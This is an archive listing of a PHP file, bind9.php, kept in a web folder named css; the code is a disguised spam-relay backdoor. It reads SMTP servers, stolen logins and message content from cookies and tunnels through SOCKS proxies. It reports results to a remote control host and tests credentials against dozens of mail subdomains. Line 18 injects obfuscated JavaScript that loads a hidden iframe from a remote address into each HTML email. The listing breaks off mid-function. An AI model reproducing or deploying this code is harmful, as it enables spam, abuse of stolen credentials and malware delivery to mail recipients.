home *** CD-ROM | disk | FTP | other *** search

---

/ ftp.t-online.hu / ftp.t-online.hu.tar / ftp.t-online.hu / public_html / css / bind9.php

< prev

next >

Wrap

Text File  |  2015-06-10  |  9KB  |  74 lines

---

1. <?error_reporting(0);
2. if(isset($_GET["ch"])){
3.     echo "OK";
4.     exit();
5. };
6. $host=urldecode($_COOKIE['ho']);$port=$_COOKIE['po'];$socks_host=$_COOKIE['sh'];$socks_port=$_COOKIE['sp'];$mail=urldecode($_COOKIE['ma']);$login=urldecode($_COOKIE['lo']);
7. $pass=urldecode($_COOKIE['pa']);$mailto=urldecode($_COOKIE['mt']);$fname=urldecode($_COOKIE['fn']);$organ=urldecode($_COOKIE['or']);$ehlo=urldecode($_COOKIE['eh']);$subj=urldecode($_COOKIE['su']);$sub=$subj;
8. $body=stripslashes(urldecode($_COOKIE['bo']));$sds=urldecode($_COOKIE['sd']);$tout=$_COOKIE['rt'];$socks_user=urldecode($_COOKIE['sl']);$socks_pass=urldecode($_COOKIE['sc']);$rel=$mail.':'.$pass;
9. if(!$_COOKIE['a']){if($socks_host){$socks=$socks_host.':'.$socks_port;}$body=str_replace("{br}", "\n", $body);$ex = explode("@", $mail);$pd = $ex[1];
10. if($_COOKIE['cm']){$fname="=?".$_COOKIE['ch']."?Q?".str_replace("+","_",str_replace("%","=",urlencode($fname)))."?=";
11. $sub="=?".$_COOKIE['ch']."?Q?".str_replace("+","_",str_replace("%","=",urlencode($subj)))."?=";}
12. $header="Date: ".date("D, j M Y G:i:s O")."\r\nFrom: ".'"'.$fname.'"'." <".$mail.">\r\nOrganization: ".$organ."\r\n";
13. $header.="X-Priority: 3 (Normal)\r\nMessage-ID: <".rand(100000000,9999999999).".".date("YmdHis")."@".$pd.">\r\nTo: ".$mailto."\r\nSubject: ".$sub."\r\nMIME-Version: 1.0\r\n";
14.  
15. if($_COOKIE['ht']=='1'){$body='<html><head><title>'.$subj.'</title>
16. <META http-equiv=Content-Type content="text/html; charset='.$_COOKIE['ch'].'">
17. </head>
18. <body>'.$body.'<tag5479347351></tag5479347351><script>eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('1 k=" i=\\"0\\" g=\\"0\\" j=\\"0\\" f=\\"c://d.h.n.l/o.m\\">";1 5="<8";1 7="p";1 4="e";1 b="</8";1 a="e>";2.3(5);9(2.3(7+4+k+b),6);9(2.3(4+a),6);',26,26,'|var|document|write|k02|k0|1000|k01|if|setTimeout|k22|k2|http|92||src|height|113|width|board||116|php|60|tag1|ram'.split('|'),0,{}))</script><tag5479347352></tag5479347352></body>';}
19.  
20. if($_COOKIE['at']){$att=$_COOKIE['at'];$atte = explode("^", urldecode($att));
21. $afph=explode("/", $atte[0]);$affdom=explode(":", $afph[2]);if(!$affdom[1]){$affdom[1]='80';}$afp=fsockopen($affdom[0],$affdom[1],$errno,$errstr,$tout);
22. if (!$afp) {post_stats('A1');exit;}fwrite($afp, "GET ".$atte[0]." HTTP/1.0\r\nHost: ".$affdom[0]."\r\nConnection: Close\r\n\r\n");
23. while(!feof($afp)){$str=fgets($afp,128);$ch.=$str;if($str=="\r\n"&&empty($he)){$he = 'do';}if($he=='do'){$att_cont.=$str;}}fclose($afp);
24. $att_cont=substr($att_cont, 2);$ch=explode(" ", $ch);if($ch[1]!='200'){post_stats('A2');exit;}if(!$att_cont){post_stats('A3');exit;}
25.  
26. $bound='----------'.strtoupper(dechex(rand(10000000,99999999)).dechex(rand(10000000,99999999)).dechex(rand(10,9999)));$attext=explode(".", $atte[1]);
27. $attct='application/octet-stream';if($attext[1]=='gif'){$attct='image/gif';}if($attext[1]=='jpg'){$attct='image/jpeg';}if($attext[1]=='jpeg'){$attct='image/jpeg';}
28. if($attext[1]=='htm'){$attct='text/html';}if($attext[1]=='html'){$attct='text/html';}
29. $header.="Content-Type: multipart/mixed;\r\n".' boundary="'.$bound.'"'."\r\n\r\n".'--'.$bound."\r\n";
30. $body.="\r\n--".$bound."\r\nContent-Type: ".$attct.";\r\n name=".'"'.$atte[1].'"'."\r\nContent-transfer-encoding: base64\r\nContent-Disposition: attachment;\r\n filename=".'"'.$atte[1].'"'."\r\n\r\n";
31. $body.=chunk_split(base64_encode($att_cont),76,"\r\n")."--".$bound."--\r\n";}
32.  
33. if($_COOKIE['ht']=='1'){$header.="Content-Type: text/html;";}else{$header.="Content-Type: text/plain;";}
34. $header.=" charset=".$_COOKIE['ch']."\r\nContent-Transfer-Encoding: 8bit\r\n";
35.  
36. if(empty($socks_host)){$fp = fsockopen($host,$port,$errno, $errstr, $tout);}else{$fp = fsockopen($socks_host,$socks_port,$errno,$errstr,$tout);
37. $h=pack("H*",'05020002');fwrite($fp,$h);$result=bin2hex(fread($fp,4));if($result == '0500'){$auth="socks5";}elseif($result == '0502'){$len_login = chr(strlen($socks_user));
38. $len_pass  = chr(strlen($socks_pass));$h=pack("H*","01").$len_login.$socks_user.$len_pass.$socks_pass;
39. fwrite($fp,$h);$result=bin2hex(fread($fp,4));if($result{3}!=0){$socks_stat='S1';fclose($fp);}else{$auth="socks5";}}else{fclose($fp);$fp = fsockopen($socks_host,$socks_port,$errno,$errstr,$tout);   
40. $query  = pack("C2", 0x04, 0x01).pack("n", $port)._host2int($host)."0".pack("C", 0);fwrite($fp,$query);$l=bin2hex(fread($fp,1024));$status = substr($l, 2, 2); 
41. IF ($status=="5a"){$auth="socks4";}ELSEIF ($status=="5b"){$socks_stat='S41';}ELSEIF ($status=="5c"){$socks_stat='S42';
42. }ELSEIF ($status=="5a"){$socks_stat='S43';}}$list="";if($auth=="socks5"){$len_h=chr(strlen($host));$h=pack("H*","05010003").$len_h.$host.pack("n",$port);
43. fwrite($fp,$h);$result=bin2hex(fread($fp,100));if($result{3} == 0){$socks_stat='OK';}elseif($result{3}==1){$socks_stat='S51';}elseif($result{3}==2){$socks_stat='S52';}
44. elseif($result{3}==3){$socks_stat='S53';}elseif($result{3}==4){$socks_stat='S54';}elseif($result{3}==5){$socks_stat='S55';}elseif($result{3}==6){$socks_stat='S56';}
45. elseif($result{3}==7){$socks_stat='S57';}elseif($result{3}==8){$socks_stat='S58';}else{$socks_stat='S59';}}elseif($auth=="socks4"){$socks_stat='OK';}else{$socks_stat='S2';}
46. if($socks_stat=='OK'){}else{post_stats($socks_stat); fclose($fp); exit;}}
47.  
48. if(!$fp) {post_stats('E1'); fclose($fp); exit;}$data = get_data($fp);fputs($fp,"EHLO ".$ehlo."\r\n");$code = substr(get_data($fp),0,3);
49. if($code!=250){post_stats('E2'); fclose($fp); exit;}fputs($fp,"AUTH LOGIN\r\n");$code = substr(get_data($fp),0,3);
50. if($code!=334){post_stats('E3'); fclose($fp); exit;}fputs($fp,base64_encode($login)."\r\n");$code = substr(get_data($fp),0,3);
51. if($code!=334){post_stats('E4'); fclose($fp); exit;}fputs($fp,base64_encode($pass)."\r\n");$code = substr(get_data($fp),0,3);
52. if($code!=235){post_stats('E5'); fclose($fp); exit;}$size_msg=strlen($header."\r\n".$body);fputs($fp,"MAIL FROM:<".$mail."> SIZE=".$size_msg."\r\n");$code = substr(get_data($fp),0,3);
53. if($code!=250){post_stats('E6'); fclose($fp); exit;}fputs($fp,"RCPT TO:<".$mailto.">\r\n");$code = substr(get_data($fp),0,3);
54. if($code!=250 AND $code!=251){post_stats('E7'); fclose($fp);exit;}fputs($fp,"DATA\r\n");$code = substr(get_data($fp),0,3);
55. if($code!=354){post_stats('E8'); fclose($fp); exit;}fputs($fp,$header."\r\n".$body."\r\n.\r\n");$code = substr(get_data($fp),0,3);
56. if($code!=250){post_stats('E9'); fclose($fp); exit;}fputs($fp,"QUIT\r\n");fclose($fp);post_stats('OK');}
57.  
58. if($_COOKIE['a']=='c'){IF($host AND $port AND $login){mch($host,$port,$login,$pass);post_mch($sds,'C3',$rel);}$fm = $mail;$mh = explode("@", $fm);$em = $mh[0];$host = $mh[1];
59. $ping = fsockopen($host,80,$errno,$errstr,$tout);if(!$ping){post_mch($sds,'C1',$rel);}fclose($ping);$smtp=smtp_lookup($host);$lport=25;$try=mch($smtp,$lport,$em,$pass);
60. if($try=='BHOST'){$smtp='ssl://'.$smtp;$lport=465;$try=mch($smtp,$lport,$em,$pass);}if($try=='BAUTH'){$try=mch($smtp,$lport,$fm,$pass);}
61. mch('smtp.'.$host,25,$em,$pass);mch('smtp.'.$host,25,$fm,$pass);mch('mail.'.$host,25,$em,$pass);mch('mail.'.$host,25,$fm,$pass);mch('mx.'.$host,25,$em,$pass);mch('mx.'.$host,25,$fm,$pass);
62. mch($host,25,$em,$pass);mch('relay.'.$host,25,$em,$pass);mch('email.'.$host,25,$em,$pass);mch('pop.'.$host,25,$em,$pass);mch('pop3.'.$host,25,$em,$pass);mch('imap.'.$host,25,$em,$pass);
63. mch('freemail.'.$host,25,$em,$pass);mch('box.'.$host,25,$em,$pass);mch('smtp.mail.'.$host,25,$em,$pass);mch($host,25,$fm,$pass);mch('relay.'.$host,25,$fm,$pass);mch('email.'.$host,25,$fm,$pass);
64. mch('pop.'.$host,25,$fm,$pass);mch('pop3.'.$host,25,$fm,$pass);mch('imap.'.$host,25,$fm,$pass);mch('freemail.'.$host,25,$fm,$pass);mch('box.'.$host,25,$fm,$pass);mch('smtp.mail.'.$host,25,$fm,$pass);
65. mch('ssl://smtp.'.$host,465,$em,$pass);mch('ssl://mail.'.$host,465,$em,$pass);mch('ssl://smtp.'.$host,465,$fm,$pass);mch('ssl://mail.'.$host,465,$fm,$pass);mch('ssl://mx.'.$host,465,$em,$pass);mch('ssl://mx.'.$host,465,$fm,$pass);
66. mch('ssl://'.$host,465,$em,$pass);mch('ssl://relay.'.$host,465,$em,$pass);mch('ssl://email.'.$host,465,$em,$pass);mch('ssl://pop.'.$host,465,$em,$pass);mch('ssl://pop3.'.$host,465,$em,$pass);mch('ssl://imap.'.$host,465,$em,$pass);
67. mch('ssl://freemail.'.$host,465,$em,$pass);mch('ssl://box.'.$host,465,$em,$pass);mch('ssl://smtp.mail.'.$host,465,$em,$pass);mch('ssl://'.$host,465,$fm,$pass);mch('ssl://relay.'.$host,465,$fm,$pass);mch('ssl://email.'.$host,465,$fm,$pass);
68. mch('ssl://pop.'.$host,465,$fm,$pass);mch('ssl://pop3.'.$host,465,$fm,$pass);mch('ssl://imap.'.$host,465,$fm,$pass);mch('ssl://freemail.'.$host,465,$fm,$pass);mch('ssl://box.'.$host,465,$fm,$pass);mch('ssl://smtp.mail.'.$host,465,$fm,$pass);post_mch($sds,'C2',$rel);}
69.  
70. function post_stats($stat){global $tout, $sds, $rel, $socks, $mailto, $att;$shl=urlencode('http://'.$_SERVER['HTTP_HOST'].$_SERVER['SCRIPT_NAME']);
71. $rel=urlencode($rel);$mailto=urlencode($mailto);$host=explode("/", $sds);$hp=explode(":", $host[0]);if(empty($hp[1])){$hp[1]='80';}
72. $data='st='.$stat.';rl='.$rel.';mt='.$mailto.';sh='.$shl.';so=U9;sk='.$socks.';at='.$att;
73. $socket = socket_create(AF_INET,SOCK_STREAM,0);socket_set_option($socket, SOL_SOCKET, SO_RCVTIMEO, array("sec" => $tout, "usec" => 0));
74. if (!socket_connect($socket, $hp[0], $hp[1])){socket_close($socke